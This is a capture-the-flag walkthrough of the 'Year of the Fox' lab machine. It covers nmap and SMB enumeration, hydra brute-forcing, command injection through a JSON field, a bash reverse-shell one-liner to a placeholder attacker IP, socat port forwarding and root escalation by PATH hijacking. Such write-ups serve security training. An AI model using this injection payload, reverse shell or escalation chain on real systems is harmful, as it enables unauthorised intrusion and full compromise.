3 minutes
Year of the Fox
Machine URL :: Year of the Fox
ENUMERATION
Starting with an nmap scan as always:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
2725/tcp filtered msolap-ptp2
49159/tcp filtered unknown
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX
Host script results:
| smb2-time:
| date: 2023-07-11T10:56:50
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -19m57s, deviation: 34m39s, median: 2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2023-07-11T11:56:49+01:00
Taking a look at the webserver first:
We don’t have any credentials to work with for now so let’s move on to Samba.
SAMBA
Use enum4linux to enumerate SMB shares:
data:image/s3,"s3://crabby-images/722e3/722e3bc09780af9780dcfc0151c46154c8128cba" alt="Hello Friend"
We got 2 users :
You can try to bruteforce smb using user fox but its time consuming.
ACTIVE ENUMERATION
Use hydra to bruteforce web login. It works with user rascal but the password changes everytime we restart the machine.
data:image/s3,"s3://crabby-images/c1c25/c1c252864073a6c70f0e163a0a0f59e5de1ed57b" alt="Hello Friend"
The website:
Search an empty string and you can see the expected input is files. Also , seems like it doesn’t like some characters.
data:image/s3,"s3://crabby-images/336a7/336a7c15aa527174554e0648c1e46b88304c1228" alt="Hello Friend"
Intercepting request with Burp:
Now , I used intruder to launch a simple SQL injection fuzzing but got nothing. So now onto command injection. You can run some commands using :
{"target":"\"; COMMAND \""}
Used RCE Command : bash -i >& /dev/tcp/YOUR-IP/PORT 0>&1
but got invalid-character response so used base 64.
data:image/s3,"s3://crabby-images/9c670/9c670c6041d7221e1c35ce964d52c11ddc921f93" alt="Hello Friend"
Use burp repeater:
data:image/s3,"s3://crabby-images/c0c42/c0c42f4f4e9e9b521babfd49ba526b8df66f6716" alt="Hello Friend"
We gain an RCE:
data:image/s3,"s3://crabby-images/269e5/269e52ac167c92a908cd7e9f94a0ec2ffbd206f8" alt="Hello Friend"
And there we get our first flag!
FOOTHOLD
Check all processes which are running:
data:image/s3,"s3://crabby-images/94e76/94e7669efe97608bbfd21da05662d6ce3d437e7a" alt="Hello Friend"
There seems to be SSH running on port 22 and can be confirmed in /etc/ssh/sshd_config
file which also tells us that only user fox can use it. We can use this.
Use socat as a TCP port forwarder. Here socat listens on port 2222 , accepts connections and forwards connections to port 22 on remote host.
data:image/s3,"s3://crabby-images/9bbbb/9bbbb4391aa17cae111cf52982f114742c85cad1" alt="Hello Friend"
We’ve established a connection. Now time to bruteforce :
data:image/s3,"s3://crabby-images/f83ae/f83aed16bb0bcb65e98fa2db42c34d0b0f3fcae7" alt="Hello Friend"
Sweet! Now SSH as User fox :
data:image/s3,"s3://crabby-images/ba131/ba131fa07153a2b2030024933587dea9d7c0d6f4" alt="Hello Friend"
And there we have our second flag!
Now see all the commands user fox can run : sudo -l
data:image/s3,"s3://crabby-images/fe1f6/fe1f679336176e87ceb4489a6805c83fffaebbe4" alt="Hello Friend"
We can run shutdown as root without password. GTFObins doesn’t give anything. Dragging the file onto our machine so we can analyze it. Use Radare2 :
r2 -AAAA /tmp/shutdown
pdg
And looks like this binary is calling the poweroff
binary which doesn’t seem to be using an absolute path. So, we can use PATH manipulation to spawn a root shell. Here we are copying /bin/bash to our own version of /tmp/poweroff
and adding that to $PATH
so that when it searches for the poweroff binary it searches the /tmp directory first.
data:image/s3,"s3://crabby-images/124db/124dbc54c6fc644cac9a688cdd13cd454debf396" alt="Hello Friend"
And there we have our root shell.
Also found this :
data:image/s3,"s3://crabby-images/9fba1/9fba18b127caac33b76ccabbf028059aa0ab2796" alt="Hello Friend"